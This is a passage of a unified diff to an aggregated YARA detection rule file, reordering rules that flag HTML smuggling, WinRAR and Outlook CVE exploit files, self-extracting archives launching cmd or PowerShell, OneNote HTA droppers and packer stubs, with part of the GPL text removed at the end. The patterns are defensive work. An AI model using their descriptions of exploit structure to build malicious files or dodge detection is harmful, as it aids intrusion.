-		$ = /="?http:\/\/0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.?\// nocase ascii wide
-		$ = /="?http:\/\/[0-9]{8,10}\.?\// nocase ascii wide
+		$ = { 50 4b 03 04 [24] 00 00 [3-64] 2e ?? ?? ?? 20 2f [3-64] 2e ?? ?? ?? 20 2e ( 626174 | 636d64 | 707331 ) }
 
 	condition:
-		any of them
+		uint16be( 0 ) == 0x504b and all of them
 }
 rule ELCEEF_HTML_Smuggling_A : T1027 FILE
 {
@@ -166106,143 +166808,6 @@ rule ELCEEF_HTML_Smuggling_C : T1027 FILE
 	condition:
 		filesize < 5MB and $mssave and #blob == 1 and #array == 1 and #loop == 1
 }
-rule ELCEEF_ZIP_High_Ratio_Single_Doc : FILE
-{
-	meta:
-		description = "Detects ZIP archives containing single MS Word document with unusually high compression ratio"
-		author = "marcin@ulikowski.pl"
-		id = "0fbe89d9-1bf5-50a9-b6c1-1d739162a2ba"
-		date = "2023-03-08"
-		modified = "2023-03-08"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/ZIP_High_Ratio_Single_Doc.yara#L8-L27"
-		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "470300b8d6356cff43a1e2be3a23a97be5d1e2ce5a76f2fb2eccdbbb47a4d327"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		hash1 = "4d9a6dfca804989d40eeca9bb2d90ef33f3980eb07ca89bbba06d0ef4b37634b"
-		hash2 = "4bc2d14585c197ad3aa5836b3f7d9d784d7afe79856e0ddf850fc3c676b6ecb1"
-
-	strings:
-		$magic = { 50 4b 03 04 }
-		$ext = ".doc"
-
-	condition:
-		filesize < 1MB and $magic at 0 and #magic == 1 and uint32( 22 ) > 1024 * 1024 * 100 and $ext at ( uint16( 26 ) + 26 )
-}
-rule ELCEEF_Outlook_CVE_2023_23397_Exploit : FILE
-{
-	meta:
-		description = "Detects Outlook meeting/appointment/task files with ReminderSoundFile property set to UNC path"
-		author = "marcin@ulikowski.pl"
-		id = "f0dfb7a6-b3bf-58c4-a9a2-978f436679d9"
-		date = "2023-03-16"
-		modified = "2023-04-20"
-		reference = "https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Outlook_CVE_2023_23397.yara#L1-L29"
-		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "695721ec276415c6a6a0f4ce6378ff2d11c15d28271f587966bc3d9d8c06f63a"
-		score = 75
-		quality = 50
-		tags = "FILE"
-		hash1 = "52dbaf64ce1a5cd1db9a9d385f8204e5f665ca53a3d904033bf1a10369490646"
-		hash2 = "582442ee950d546744f2fa078adb005853a453e9c7f48c6c770e6322a888c2cf"
-		hash3 = "078b5023cae7bd784a84ec4ee8df305ee7825025265bf2ddc1f5238c3e432f5f"
-		hash4 = "1867bc9f81e99a55103288ce10c5c05267119ebb13757686e59bfed156f62b51"
-
-	strings:
-		$pid_reminder_file = { 1f 85 00 00 0? 00 ?? 00 }
-		$pid_reminder_override = { 1c 85 00 00 0? 00 ?? 00 }
-		$psetid_common = { 08 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$psetid_appointment = { 02 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$psetid_task = { 03 20 06 00 00 00 00 00 c0 00 00 00 00 00 00 46 }
-		$unc = /\\\\([a-z1-9][a-z0-9.]{6}|\.\\UNC\\\\)/ wide ascii
-
-	condition:
-		filesize < 1MB and ( uint32be( 0 ) == 0xd0cf11e0 or uint32be( 0 ) == 0x789f3e22 ) and ( $psetid_appointment or $psetid_task ) and $psetid_common and ( $pid_reminder_file and $pid_reminder_override ) and $unc
-}
-rule ELCEEF_HTML_Windows_Search_Abuse
-{
-	meta:
-		description = "Detects HTML files abusing Windows system functionalities to redirect and download malicious payloads"
-		author = "marcin@ulikowski.pl"
-		id = "537cb46e-4cfc-517c-8d6d-0019f2c3e5ef"
-		date = "2024-06-15"
-		modified = "2024-06-16"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/HTML_Windows_Search.yara#L1-L22"
-		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "6a0d490cf08ab0aad3c535645abe9ebc26d12768cf2a2e932cdb7ec93cf3e2bd"
-		score = 75
-		quality = 73
-		tags = ""
-		hash1 = "d136dcfc355885c502ff2c3be229791538541b748b6c07df3ced95f9a7eb2f30"
-
-	strings:
-		$location1 = "location.href" wide ascii
-		$location2 = "location.replace(" wide ascii
-		$location3 = "location.assign(" wide ascii
-		$metarefresh = "<meta http-equiv=\"refresh\"" nocase wide ascii
-		$search1 = "\"search-ms:query=" wide ascii
-		$search2 = "\"search:query=" wide ascii
-		$search3 = "URL=search:query=" wide ascii
-		$crumb1 = "&crumb=location:" wide ascii
-		$crumb2 = "&amp;crumb=location:" wide ascii
-
-	condition:
-		( any of ( $location* ) or $metarefresh ) and any of ( $search* ) and any of ( $crumb* )
-}
-rule ELCEEF_Winrar_CVE_2023_38831_Exploit : CVE_2023_38831 FILE
-{
-	meta:
-		description = "Detects ZIP archives exploiting CVE-2023-38831 in WinRAR"
-		author = "marcin@ulikowski.pl"
-		id = "7d592eb7-b344-59ed-adf8-fe69ebb1e43f"
-		date = "2023-09-23"
-		modified = "2023-09-28"
-		reference = "https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/WinRAR_CVE_2023_38831.yara#L1-L17"
-		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "06f1d807429fb175831cf333b05b44b6ce33b4ae981e16c03e36ec7564a4fdd1"
-		score = 75
-		quality = 75
-		tags = "CVE-2023-38831, FILE"
-		hash1 = "00175d538cba0c493e397a0b7f4b28f9a90dd0ee40f69795ae28d23ce0d826c0"
-		hash2 = "ca8ca67df7853b86b6a107c8fd7f73b757de9143ea8844d0e6209249e8377885"
-
-	strings:
-		$ = { 50 4b 03 04 [24] 00 00 [3-64] 2e ?? ?? ?? 20 2f [3-64] 2e ?? ?? ?? 20 2e ( 626174 | 636d64 | 707331 ) }
-
-	condition:
-		uint16be( 0 ) == 0x504b and all of them
-}
-rule ELCEEF_Suspicious_SFX : FILE
-{
-	meta:
-		description = "Detects self-extracting archives (SFX) executing cmd.exe or powershell.exe"
-		author = "marcin@ulikowski.pl"
-		id = "78f4ae8b-ba17-5c02-a6f0-66bec873aba8"
-		date = "2023-04-04"
-		modified = "2023-04-04"
-		reference = "https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Suspicious_SFX.yara#L1-L22"
-		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "688ed356e2fa936a0e07a8479591c28fb457053ed94351bad4bf367b02f04b0a"
-		score = 65
-		quality = 73
-		tags = "FILE"
-
-	strings:
-		$rar = { 52 61 72 21 }
-		$zip = { 50 4b 03 04 }
-		$setup_cmd = "\nSetup=cmd"
-		$setup_powershell = "\nSetup=powershell"
-		$silent = "\nSilent=1"
-
-	condition:
-		filesize < 1MB and uint16be( 0 ) == 0x4d5a and any of ( $zip , $rar ) and any of ( $setup_* ) and $silent
-}
 rule ELCEEF_EICAR_Encrypted_ZIP
 {
 	meta:
@@ -166275,56 +166840,6 @@ rule ELCEEF_EICAR_Encrypted_ZIP
 	condition:
 		for any i in ( 1 .. #local ) : ( ( uint8( @local [ i ] + 6 ) & 0x01 or uint8( @local [ i ] + 6 ) & 0x40 ) and uint32( @local [ i ] + 14 ) == 0x6851cf3c and uint32( @local [ i ] + 22 ) == 68 )
 }
-rule ELCEEF_OLE2_Autoopen_Reversed_Payload : FILE
-{
-	meta:
-		description = "Detects suspiciously reversed payloads in OLE2 objects with auto-open macros"
-		author = "marcin@ulikowski.pl"
-		id = "9244fdb7-9949-58a0-9e39-e61e04cc1574"
-		date = "2021-12-01"
-		modified = "2023-04-04"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/OLE2_Reversed.yara#L1-L20"
-		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "425750e77d31ddc356f803ee6e2f192f93f64534a9633fef02da5caaa60dbcaf"
-		score = 65
-		quality = 42
-		tags = "FILE"
-
-	strings:
-		$auto_open = /(auto|document|workbook)_?(open|close)/ wide ascii nocase
-		$http = /\/\/:s?ptth/ wide ascii
-		$programdata = /\\ataDmargorP\\\\?:C/ wide ascii nocase
-		$windows = /\\swodniW\\\\?:C/ wide ascii nocase
-
-	condition:
-		filesize < 1MB and uint32be( 0 ) == 0xd0cf11e0 and $auto_open and any of ( $http , $programdata , $windows )
-}
-rule ELCEEF_Base64_SVG_Javascript
-{
-	meta:
-		description = "Detects base64 encoded SVG objects containing Javascript"
-		author = "marcin@ulikowski.pl"
-		id = "99275772-1f4f-5616-9a9c-f76b613fe143"
-		date = "2022-10-25"
-		modified = "2022-12-12"
-		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Base64_SVG_Javascript.yara#L1-L16"
-		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "e4cb08ccc75dc00b518c4ee1495409ae6bb99e7d493be55312b8d39aa9099cfc"
-		score = 75
-		quality = 75
-		tags = ""
-		hash1 = "fe394a59e961c3fbcc326e7d0ee5909596de55249e669bc4da0aed172c11fda8"
-		hash2 = "f0c94f2705b1aea17f4a6c6d71c6ed725fe71bf66b03b0117060010859ca8a19"
-
-	strings:
-		$svg = "\"data:image/svg+xml;base64" wide ascii
-		$js = "<script type=\"text/javascript\">" base64
-
-	condition:
-		all of them
-}
 rule ELCEEF_BAT_Obfuscated_Setenv
 {
 	meta:
@@ -166409,25 +166924,100 @@ rule ELCEEF_Polymorph_BAT_CAB : FILE
 		date = "2024-04-10"
 		modified = "2024-04-10"
 		reference = "https://github.com/elceef/yara-rulz"
-		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Suspicious_BAT.yara#L57-L72"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Suspicious_BAT.yara#L57-L72"
+		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
+		logic_hash = "d29d488b0ebcfb485818c181ac674e3586aa1a41ab68185a1f1d3e49295ffbce"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		hash1 = "f1296b12925108a5d675a8b9c2033c0b749b121ae3b5a6a912ce4418daa06d99"
+
+	strings:
+		$extract = { 65 78 74 72 61 63 ( 33 32 | 74 ) 20 2f 79 20 22 25 7e 66 30 22 }
+
+	condition:
+		uint32be( 0 ) == 0x4d534346 and uint32( 16 ) > 80 and $extract in ( 48 .. 80 )
+}
+rule ELCEEF_Obfuscated_IP_Address_In_URL
+{
+	meta:
+		description = "Detects hexadecimal and octal IP address representations in URL"
+		author = "marcin@ulikowski.pl"
+		id = "f2ebf5f7-5446-5eaa-8e30-90d08b8616d9"
+		date = "2020-09-17"
+		modified = "2024-03-04"
+		reference = "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-urls-in-spam/"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Obfuscated_IPAddr_URL.yara#L1-L17"
+		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
+		logic_hash = "ab2a2a3a56e6eed9f4a3a8f994c89a167f00b86ce442820c81d8ee673b0ab85c"
+		score = 75
+		quality = 40
+		tags = ""
+
+	strings:
+		$ = /="?http:\/\/0[0-7]{1,3}\.0[0-7]{1,3}\.0[0-7]{1,3}\.0[0-7]{1,3}\.?\// nocase ascii wide
+		$ = /="?http:\/\/0x[0-9a-f]{8}\.?\// nocase ascii wide
+		$ = /="?http:\/\/0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.0x[0-9a-f]{2}\.?\// nocase ascii wide
+		$ = /="?http:\/\/[0-9]{8,10}\.?\// nocase ascii wide
+
+	condition:
+		any of them
+}
+rule ELCEEF_Base64_SVG_Javascript
+{
+	meta:
+		description = "Detects base64 encoded SVG objects containing Javascript"
+		author = "marcin@ulikowski.pl"
+		id = "99275772-1f4f-5616-9a9c-f76b613fe143"
+		date = "2022-10-25"
+		modified = "2022-12-12"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/Base64_SVG_Javascript.yara#L1-L16"
+		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
+		logic_hash = "e4cb08ccc75dc00b518c4ee1495409ae6bb99e7d493be55312b8d39aa9099cfc"
+		score = 75
+		quality = 75
+		tags = ""
+		hash1 = "fe394a59e961c3fbcc326e7d0ee5909596de55249e669bc4da0aed172c11fda8"
+		hash2 = "f0c94f2705b1aea17f4a6c6d71c6ed725fe71bf66b03b0117060010859ca8a19"
+
+	strings:
+		$svg = "\"data:image/svg+xml;base64" wide ascii
+		$js = "<script type=\"text/javascript\">" base64
+
+	condition:
+		all of them
+}
+rule ELCEEF_HTA_Wscriptshell_Onenote : FILE
+{
+	meta:
+		description = "Detects suspicious OneNote documents with embedded HTA + WScript.Shell"
+		author = "marcin@ulikowski.pl"
+		id = "8cebd862-8dfb-5f5d-befb-5c41cde945ff"
+		date = "2023-02-01"
+		modified = "2023-02-02"
+		reference = "https://github.com/elceef/yara-rulz"
+		source_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/rules/HTA_OneNote.yara#L1-L17"
 		license_url = "https://github.com/elceef/yara-rulz/blob/05834717d1464d5efce8ad9d688ff7b53886a0bb/LICENSE"
-		logic_hash = "d29d488b0ebcfb485818c181ac674e3586aa1a41ab68185a1f1d3e49295ffbce"
-		score = 75
+		logic_hash = "0287ac5d618c9a8332d167f1a05157aa829c7e8a052c35100fcaeb644d452e5c"
+		score = 65
 		quality = 75
 		tags = "FILE"
-		hash1 = "f1296b12925108a5d675a8b9c2033c0b749b121ae3b5a6a912ce4418daa06d99"
+		hash1 = "002fe00bc429877ee2a786a1d40b80250fd66e341729c5718fc66f759387c88c"
 
 	strings:
-		$extract = { 65 78 74 72 61 63 ( 33 32 | 74 ) 20 2f 79 20 22 25 7e 66 30 22 }
+		$magic = { ae b1 53 78 d0 29 96 d3 }
+		$hta = { 00 04 00 00 00 2e 00 68 00 74 00 61 }
+		$wsh = "CreateObject(\"WScript.Shell\")"
 
 	condition:
-		uint32be( 0 ) == 0x4d534346 and uint32( 16 ) > 80 and $extract in ( 48 .. 80 )
+		filesize < 5MB and $magic at 8 and $wsh and $hta
 }
 /*
  * YARA Rule Set
  * Repository Name: GodModeRules
  * Repository: https://github.com/Neo23x0/god-mode-rules/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 436dc682164cf17a123d6b09d1424e7e2acf0c25
  * Number of Rules: 1
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -166698,7 +167288,7 @@ rule GODMODERULES_IDDQD_God_Mode_Rule
  * YARA Rule Set
  * Repository Name: Cod3nym
  * Repository: https://github.com/cod3nym/detection-rules/
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: ad485bff0ce30afb56e367b7f2b76fea81e78fc9
  * Number of Rules: 13
  * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
@@ -166925,6 +167515,30 @@ rule COD3NYM_Reactor_Indicators : SUSPICIOUS OBFUSCATION FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and 2 of them
 }
+
+rule COD3NYM_SUSP_OBF_NET_Reactor_Native_Stub_Jan24
+{
+	meta:
+		description = "Detects native packer stub for version 4.5-4.7 of .NET Reactor. A pirated copy of version 4.5 of this commercial obfuscation solution is used by various malware families like BlackBit, RedLine, AgentTesla etc."
+		author = "Jonathan Peters"
+		id = "529dce88-a81d-5a98-aa6c-1f1b739ad074"
+		date = "2024-01-05"
+		modified = "2024-01-12"
+		reference = "https://notes.netbytesec.com/2023/08/understand-ransomware-ttps-blackbit.html"
+		source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/obf_net_reactor.yar#L3-L16"
+		license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md"
+		hash = "6e8a7adf680bede7b8429a18815c232004057607fdfbf0f4b0fb1deba71c5df7"
+		logic_hash = "287273babd3cd6bc1986b018367317019f2249851a2c19fc83857f7ff0b90b54"
+		score = 70
+		quality = 80
+		tags = ""
+
+	strings:
+		$op = {C6 44 24 18 E0 C6 44 24 19 3B C6 44 24 1A 8D C6 44 24 1B 2A C6 44 24 1C A2 C6 44 24 1D 2A C6 44 24 1E 2A C6 44 24 1F 41 C6 44 24 20 D3 C6 44 24 21 20 C6 44 24 22 64 C6 44 24 23 06 C6 44 24 24 8A C6 44 24 25 F7 C6 44 24 26 3D C6 44 24 27 9D C6 44 24 28 D9 C6 44 24 29 EE C6 44 24 2A 15 C6 44 24 2B 68 C6 44 24 2C F4 C6 44 24 2D 76 C6 44 24 2E B9 C6 44 24 2F 34 C6 44 24 30 BF C6 44 24 31 1E C6 44 24 32 E7 C6 44 24 33 78 C6 44 24 34 98 C6 44 24 35 E9 C6 44 24 36 6F C6 44 24 37 B4}
+
+	condition:
+		for any i in ( 0 .. pe.number_of_resources -1 ) : ( pe.resources [ i ] . name_string == "_\x00_\x00" ) and $op
+}
 rule COD3NYM_SUSP_NET_Shellcode_Loader_Indicators_Jan24 : FILE
 {
 	meta:
@@ -166954,30 +167568,6 @@ rule COD3NYM_SUSP_NET_Shellcode_Loader_Indicators_Jan24 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and 3 of ( $sa* ) and #x == 1
 }
-
-rule COD3NYM_SUSP_OBF_NET_Reactor_Native_Stub_Jan24
-{
-	meta:
-		description = "Detects native packer stub for version 4.5-4.7 of .NET Reactor. A pirated copy of version 4.5 of this commercial obfuscation solution is used by various malware families like BlackBit, RedLine, AgentTesla etc."
-		author = "Jonathan Peters"
-		id = "529dce88-a81d-5a98-aa6c-1f1b739ad074"
-		date = "2024-01-05"
-		modified = "2024-01-12"
-		reference = "https://notes.netbytesec.com/2023/08/understand-ransomware-ttps-blackbit.html"
-		source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/obf_net_reactor.yar#L3-L16"
-		license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md"
-		hash = "6e8a7adf680bede7b8429a18815c232004057607fdfbf0f4b0fb1deba71c5df7"
-		logic_hash = "287273babd3cd6bc1986b018367317019f2249851a2c19fc83857f7ff0b90b54"
-		score = 70
-		quality = 80
-		tags = ""
-
-	strings:
-		$op = {C6 44 24 18 E0 C6 44 24 19 3B C6 44 24 1A 8D C6 44 24 1B 2A C6 44 24 1C A2 C6 44 24 1D 2A C6 44 24 1E 2A C6 44 24 1F 41 C6 44 24 20 D3 C6 44 24 21 20 C6 44 24 22 64 C6 44 24 23 06 C6 44 24 24 8A C6 44 24 25 F7 C6 44 24 26 3D C6 44 24 27 9D C6 44 24 28 D9 C6 44 24 29 EE C6 44 24 2A 15 C6 44 24 2B 68 C6 44 24 2C F4 C6 44 24 2D 76 C6 44 24 2E B9 C6 44 24 2F 34 C6 44 24 30 BF C6 44 24 31 1E C6 44 24 32 E7 C6 44 24 33 78 C6 44 24 34 98 C6 44 24 35 E9 C6 44 24 36 6F C6 44 24 37 B4}
-
-	condition:
-		for any i in ( 0 .. pe.number_of_resources -1 ) : ( pe.resources [ i ] . name_string == "_\x00_\x00" ) and $op
-}
 rule COD3NYM_MAL_NET_Limecrypter_Runpe_Jan24 : FILE
 {
 	meta:
@@ -167155,7 +167745,7 @@ rule COD3NYM_SUSP_RLO_Exe_Extension_Spoofing_Jan24
  * YARA Rule Set
  * Repository Name: craiu
  * Repository: https://github.com/craiu/yararules
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 23cf0ca22021fa3684e180a18416b9ae1b695243
  * Number of Rules: 13
  * Skipped: 0 (age), 0 (quality), 0 (score), 0 (importance)
@@ -167562,42904 +168152,41632 @@ not survive such relicensing or conveying.
 
   If you add terms to a covered work in accord with this section, you
 must place, in the relevant source files, a statement of the
-additional terms that apply to those files, or a notice indicating
-where to find the applicable terms.
-
-  Additional terms, permissive or non-permissive, may be stated in the
-form of a separately written license, or stated as exceptions;
-the above requirements apply either way.
-
-  8. Termination.
-
-  You may not propagate or modify a covered work except as expressly
-provided under this License.  Any attempt otherwise to propagate or
-modify it is void, and will automatically terminate your rights under
-this License (including any patent licenses granted under the third
-paragraph of section 11).
-
-  However, if you cease all violation of this License, then your
-license from a particular copyright holder is reinstated (a)
-provisionally, unless and until the copyright holder explicitly and
-finally terminates your license, and (b) permanently, if the copyright
-holder fails to notify you of the violation by some reasonable means
-prior to 60 days after the cessation.
-
-  Moreover, your license from a particular copyright holder is
-reinstated permanently if the copyright holder notifies you of the
-violation by some reasonable means, this is the first time you have
-received notice of violation of this License (for any work) from that
-copyright holder, and you cure the violation prior to 30 days after
-your receipt of the notice.
-
-  Termination of your rights under this section does not terminate the
-licenses of parties who have received copies or rights from you under
-this License.  If your rights have been terminated and not permanently
-reinstated, you do not qualify to receive new licenses for the same
-material under section 10.
-
-  9. Acceptance Not Required for Having Copies.
-
-  You are not required to accept this License in order to receive or
-run a copy of the Program.  Ancillary propagation of a covered work
-occurring solely as a consequence of using peer-to-peer transmission
-to receive a copy likewise does not require acceptance.  However,
-nothing other than this License grants you permission to propagate or
-modify any covered work.  These actions infringe copyright if you do
-not accept this License.  Therefore, by modifying or propagating a
-covered work, you indicate your acceptance of this License to do so.
-
-  10. Automatic Licensing of Downstream Recipients.
-
-  Each time you convey a covered work, the recipient automatically
-receives a license from the original licensors, to run, modify and
-propagate that work, subject to this License.  You are not responsible
-for enforcing compliance by third parties with this License.
-
-  An "entity transaction" is a transaction transferring control of an
-organization, or substantially all assets of one, or subdividing an
-organization, or merging organizations.  If propagation of a covered
-work results from an entity transaction, each party to that
-transaction who receives a copy of the work also receives whatever
-licenses to the work the party's predecessor in interest had or could
-give under the previous paragraph, plus a right to possession of the
-Corresponding Source of the work from the predecessor in interest, if
-the predecessor has it or can get it with reasonable efforts.
-
-  You may not impose any further restrictions on the exercise of the
-rights granted or affirmed under this License.  For example, you may
-not impose a license fee, royalty, or other charge for exercise of
-rights granted under this License, and you may not initiate litigation
-(including a cross-claim or counterclaim in a lawsuit) alleging that
-any patent claim is infringed by making, using, selling, offering for
-sale, or importing the Program or any portion of it.
-
-  11. Patents.
-
-  A "contributor" is a copyright holder who authorizes use under this
-License of the Program or a work on which the Program is based.  The
-work thus licensed is called the contributor's "contributor version".
-
-  A contributor's "essential patent claims" are all patent claims
-owned or controlled by the contributor, whether already acquired or
-hereafter acquired, that would be infringed by some manner, permitted
-by this License, of making, using, or selling its contributor version,
-but do not include claims that would be infringed only as a
-consequence of further modification of the contributor version.  For
-purposes of this definition, "control" includes the right to grant
-patent sublicenses in a manner consistent with the requirements of
-this License.
-
-  Each contributor grants you a non-exclusive, worldwide, royalty-free
-patent license under the contributor's essential patent claims, to
-make, use, sell, offer for sale, import and otherwise run, modify and
-propagate the contents of its contributor version.
-
-  In the following three paragraphs, a "patent license" is any express
-agreement or commitment, however denominated, not to enforce a patent
-(such as an express permission to practice a patent or covenant not to
-sue for patent infringement).  To "grant" such a patent license to a
-party means to make such an agreement or commitment not to enforce a
-patent against the party.
-
-  If you convey a covered work, knowingly relying on a patent license,
-and the Corresponding Source of the work is not available for anyone
-to copy, free of charge and under the terms of this License, through a
-publicly available network server or other readily accessible means,
-then you must either (1) cause the Corresponding Source to be so
-available, or (2) arrange to deprive yourself of the benefit of the
-patent license for this particular work, or (3) arrange, in a manner
-consistent with the requirements of this License, to extend the patent
-license to downstream recipients.  "Knowingly relying" means you have
-actual knowledge that, but for the patent license, your conveying the
-covered work in a country, or your recipient's use of the covered work
-in a country, would infringe one or more identifiable patents in that
-country that you have reason to believe are valid.
-
-  If, pursuant to or in connection with a single transaction or
-arrangement, you convey, or propagate by procuring conveyance of, a
-covered work, and grant a patent license to some of the parties
-receiving the covered work authorizing them to use, propagate, modify
-or convey a specific copy of the covered work, then the patent license
-you grant is automatically extended to all recipients of the covered
-work and works based on it.
-
-  A patent license is "discriminatory" if it does not include within
-the scope of its coverage, prohibits the exercise of, or is
-conditioned on the non-exercise of one or more of the rights that are
-specifically granted under this License.  You may not convey a covered
-work if you are a party to an arrangement with a third party that is
-in the business of distributing software, under which you make payment
-to the third party based on the extent of your activity of conveying
-the work, and under which the third party grants, to any of the
-parties who would receive the covered work from you, a discriminatory
-patent license (a) in connection with copies of the covered work
-conveyed by you (or copies made from those copies), or (b) primarily
-for and in connection with specific products or compilations that
-contain the covered work, unless you entered into that arrangement,
-or that patent license was granted, prior to 28 March 2007.
-
-  Nothing in this License shall be construed as excluding or limiting
-any implied license or other defenses to infringement that may
-otherwise be available to you under applicable patent law.
-
-  12. No Surrender of Others' Freedom.
-
-  If conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot convey a
-covered work so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you may
-not convey it at all.  For example, if you agree to terms that obligate you
-to collect a royalty for further conveying from those to whom you convey
-the Program, the only way you could satisfy both those terms and this
-License would be to refrain entirely from conveying the Program.
-
-  13. Use with the GNU Affero General Public License.
-
-  Notwithstanding any other provision of this License, you have
-permission to link or combine any covered work with a work licensed
-under version 3 of the GNU Affero General Public License into a single
-combined work, and to convey the resulting work.  The terms of this
-License will continue to apply to the part which is the covered work,
-but the special requirements of the GNU Affero General Public License,
-section 13, concerning interaction through a network will apply to the
-combination as such.
-
-  14. Revised Versions of this License.
-
-  The Free Software Foundation may publish revised and/or new versions of
-the GNU General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-  Each version is given a distinguishing version number.  If the
-Program specifies that a certain numbered version of the GNU General
-Public License "or any later version" applies to it, you have the
-option of following the terms and conditions either of that numbered
-version or of any later version published by the Free Software
-Foundation.  If the Program does not specify a version number of the
-GNU General Public License, you may choose any version ever published
-by the Free Software Foundation.
-
-  If the Program specifies that a proxy can decide which future
-versions of the GNU General Public License can be used, that proxy's
-public statement of acceptance of a version permanently authorizes you
-to choose that version for the Program.
-
-  Later license versions may give you additional or different
-permissions.  However, no additional obligations are imposed on any
-author or copyright holder as a result of your choosing to follow a
-later version.
-
-  15. Disclaimer of Warranty.
-
-  THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
-APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
-HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
-OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
-THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
-PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
-IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
-ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
-
-  16. Limitation of Liability.
-
-  IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
-THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
-GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
-USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
-DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
